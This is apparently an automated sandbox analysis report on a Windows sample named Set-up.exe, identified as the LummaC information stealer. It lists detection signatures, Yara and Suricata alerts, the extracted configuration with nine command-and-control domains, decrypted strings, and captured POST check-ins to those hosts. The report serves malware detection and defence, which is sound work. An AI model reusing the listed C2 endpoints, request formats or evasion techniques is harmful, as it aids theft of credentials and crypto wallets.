Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1532477
MD5:4b923f3600f76ea3fcf20959d94369ac
SHA1:b79ce50dcabc145555a36e7d97f341644107157b
SHA256:b80b75d889d42db1bbd9bc8b748c5c9390bb015286931579c1bcac7562de6a56
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Set-up.exe (PID: 1012 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 4B923F3600F76EA3FCF20959D94369AC)
    • WerFault.exe (PID: 1184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 1600 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["sippymroat.cfd", "mathcucom.sbs", "ehticsprocw.sbs", "condifendteu.sbs", "drawwyobstacw.sbs", "resinedyw.sbs", "enlargkiw.sbs", "allocatinow.sbs", "vennurviot.sbs"], "Build id": "BVnUqo--@aboba45"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x5471f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:13.803098+020020546531A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
      2024-10-13T11:42:14.760733+020020546531A Network Trojan was detected192.168.2.449732188.114.96.3443TCP
      2024-10-13T11:42:15.827479+020020546531A Network Trojan was detected192.168.2.449733172.67.152.13443TCP
      2024-10-13T11:42:16.767536+020020546531A Network Trojan was detected192.168.2.449734104.21.77.78443TCP
      2024-10-13T11:42:18.000399+020020546531A Network Trojan was detected192.168.2.449735172.67.140.193443TCP
      2024-10-13T11:42:18.937149+020020546531A Network Trojan was detected192.168.2.449737104.21.30.221443TCP
      2024-10-13T11:42:19.886594+020020546531A Network Trojan was detected192.168.2.449741172.67.141.136443TCP
      2024-10-13T11:42:20.873314+020020546531A Network Trojan was detected192.168.2.449743188.114.96.3443TCP
      2024-10-13T11:42:23.168391+020020546531A Network Trojan was detected192.168.2.449746104.21.53.8443TCP
      2024-10-13T11:42:24.345642+020020546531A Network Trojan was detected192.168.2.449747104.21.53.8443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:13.803098+020020498361A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
      2024-10-13T11:42:14.760733+020020498361A Network Trojan was detected192.168.2.449732188.114.96.3443TCP
      2024-10-13T11:42:15.827479+020020498361A Network Trojan was detected192.168.2.449733172.67.152.13443TCP
      2024-10-13T11:42:16.767536+020020498361A Network Trojan was detected192.168.2.449734104.21.77.78443TCP
      2024-10-13T11:42:18.000399+020020498361A Network Trojan was detected192.168.2.449735172.67.140.193443TCP
      2024-10-13T11:42:18.937149+020020498361A Network Trojan was detected192.168.2.449737104.21.30.221443TCP
      2024-10-13T11:42:19.886594+020020498361A Network Trojan was detected192.168.2.449741172.67.141.136443TCP
      2024-10-13T11:42:20.873314+020020498361A Network Trojan was detected192.168.2.449743188.114.96.3443TCP
      2024-10-13T11:42:23.168391+020020498361A Network Trojan was detected192.168.2.449746104.21.53.8443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:24.345642+020020498121A Network Trojan was detected192.168.2.449747104.21.53.8443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:19.460477+020020565591Domain Observed Used for C2 Detected192.168.2.449741172.67.141.136443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:20.429036+020020565571Domain Observed Used for C2 Detected192.168.2.449743188.114.96.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:18.521222+020020565611Domain Observed Used for C2 Detected192.168.2.449737104.21.30.221443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:15.301012+020020565671Domain Observed Used for C2 Detected192.168.2.449733172.67.152.13443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:14.310273+020020565711Domain Observed Used for C2 Detected192.168.2.449732188.114.96.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:16.329296+020020565651Domain Observed Used for C2 Detected192.168.2.449734104.21.77.78443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:17.561594+020020565631Domain Observed Used for C2 Detected192.168.2.449735172.67.140.193443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:14.762853+020020565681Domain Observed Used for C2 Detected192.168.2.4539881.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:18.960890+020020565581Domain Observed Used for C2 Detected192.168.2.4637341.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:19.899655+020020565561Domain Observed Used for C2 Detected192.168.2.4495011.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:18.026733+020020565601Domain Observed Used for C2 Detected192.168.2.4554211.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:14.795220+020020565661Domain Observed Used for C2 Detected192.168.2.4502891.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:13.808579+020020565701Domain Observed Used for C2 Detected192.168.2.4585181.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:15.834870+020020565641Domain Observed Used for C2 Detected192.168.2.4632421.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:16.813607+020020565621Domain Observed Used for C2 Detected192.168.2.4639261.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-13T11:42:22.179172+020028586661Domain Observed Used for C2 Detected192.168.2.449745104.102.49.254443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
      Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
      Source: Set-up.exe.1012.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["sippymroat.cfd", "mathcucom.sbs", "ehticsprocw.sbs", "condifendteu.sbs", "drawwyobstacw.sbs", "resinedyw.sbs", "enlargkiw.sbs", "allocatinow.sbs", "vennurviot.sbs"], "Build id": "BVnUqo--@aboba45"}
      Source: vennurviot.sbsVirustotal: Detection: 16%Perma Link
      Source: mathcucom.sbsVirustotal: Detection: 19%Perma Link
      Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
      Source: https://vennurviot.sbs/Virustotal: Detection: 17%Perma Link
      Source: mathcucom.sbsVirustotal: Detection: 19%Perma Link
      Source: https://ehticsprocw.sbs/piVirustotal: Detection: 11%Perma Link
      Source: https://vennurviot.sbs/apiVirustotal: Detection: 17%Perma Link
      Source: https://enlargkiw.sbs/Virustotal: Detection: 17%Perma Link
      Source: https://sergei-esenin.com/rVirustotal: Detection: 16%Perma Link
      Source: Set-up.exeReversingLabs: Detection: 34%
      Source: Set-up.exeVirustotal: Detection: 41%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 83.0% probability
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: drawwyobstacw.sbs
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: condifendteu.sbs
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: ehticsprocw.sbs
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: vennurviot.sbs
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: resinedyw.sbs
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: enlargkiw.sbs
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: allocatinow.sbs
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: mathcucom.sbs
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: sippymroat.cfd
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: BVnUqo--@aboba45
      Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: Set-up.exe
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_029D7032
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h0_2_029F2682
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [ebx+edx], 0000h0_2_029F2682
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ecx, byte ptr [esi]0_2_029FD6A2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_029F7792
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_029FF712
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [ecx], al0_2_029FC4A3
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_029EE412
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-28D9FA8Bh]0_2_029E2407
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov ecx, eax0_2_029E145C
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov esi, edx0_2_029F9444
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_02A15452
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp+04h]0_2_029E05C2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi]0_2_02A0C562
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_029E0542
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then xor byte ptr [esp+edx+0Ch], dl0_2_02A0F542
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000F2h]0_2_029F0A92
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_029DEAC2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_029EEA12
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov edx, ecx0_2_029FEA52
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 21912799h0_2_029DFA78

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.4:63926 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.4:63734 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.4:63242 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.4:55421 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.4:49501 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.4:53988 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.4:49741 -> 172.67.141.136:443
      Source: Network trafficSuricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.4:50289 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.4:49735 -> 172.67.140.193:443
      Source: Network trafficSuricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.4:49737 -> 104.21.30.221:443
      Source: Network trafficSuricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.4:49732 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.4:49734 -> 104.21.77.78:443
      Source: Network trafficSuricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.4:49733 -> 172.67.152.13:443
      Source: Network trafficSuricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.4:58518 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.4:49743 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 172.67.152.13:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 172.67.141.136:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.152.13:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.141.136:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 104.21.30.221:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.30.221:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.77.78:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.77.78:443
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49745 -> 104.102.49.254:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 172.67.140.193:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 172.67.140.193:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49747 -> 104.21.53.8:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.53.8:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49746 -> 104.21.53.8:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.53.8:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
      Source: Malware configuration extractorURLs: sippymroat.cfd
      Source: Malware configuration extractorURLs: mathcucom.sbs
      Source: Malware configuration extractorURLs: ehticsprocw.sbs
      Source: Malware configuration extractorURLs: condifendteu.sbs
      Source: Malware configuration extractorURLs: drawwyobstacw.sbs
      Source: Malware configuration extractorURLs: resinedyw.sbs
      Source: Malware configuration extractorURLs: enlargkiw.sbs
      Source: Malware configuration extractorURLs: allocatinow.sbs
      Source: Malware configuration extractorURLs: vennurviot.sbs
      Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sippymroat.cfd
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=4G4G655HG37LedGy7IC8mS3vzKXQFLHIQIpWE8gp8rk-1728812542-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: sergei-esenin.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ 